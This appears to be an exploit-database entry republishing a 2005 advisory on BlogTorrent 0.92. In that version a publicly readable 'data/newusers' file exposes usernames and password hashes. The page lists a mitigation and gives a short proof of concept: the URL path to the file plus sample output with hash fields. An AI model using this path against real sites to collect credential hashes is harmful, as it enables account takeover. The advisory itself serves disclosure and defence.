header-logo
Suggest Exploit
vendor:
BlogTorrent
by:
LazyCrs && pjphem
7,5
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: BlogTorrent
Affected Version From: 0.92
Affected Version To: 0.92
Patch Exists: Yes
Related CWE: N/A
CPE: a:blogtorrent:blogtorrent:0.92
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

BlogTorrent 0.92 <= Remote/Local User Password Disclosure

A vulnerability in BlogTorrent 0.92 allows an attacker to remotely or locally disclose the username and password of a user. This is done by accessing the 'data/newusers' file which contains the username and password in MD5 format.

Mitigation:

Upgrade to the latest version of BlogTorrent and ensure that the 'data/newusers' file is not publicly accessible.
Source

Exploit-DB raw data:

# Edited for easy info. /str0ke

Software:    BlogTorrent 0.92 <=
Vendor:      http://www.blogtorrent.com/
Author:      LazyCrs && pjphem
Date:        10/07/2005
Type:        Remote/Local User Password Disclosure

#0x03 - POC

http://test/path_of_blog/data/newusers
=
d40:14ae696abdca1688dd577fe486c3981f331457b0d7:Createdi1120957648e5:Email17:email@email4:Hash40:d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

Username (crypt in md5) ->  14ae696abdca1688dd577fe486c3981f331457b0d7
Password  (crypt in md5) ->  d7b82821fe725305bded2fab9e91ed1e0e6fd93bee

#LazyCrs[AT]GMail[DOT]com - pjphem[AT]mybox[DOT]it
#FREE RAFA! FREE RAFA! FREE RAFA!

# milw0rm.com [2005-07-11]

Navigation

Suggest Exploit

Services By CQR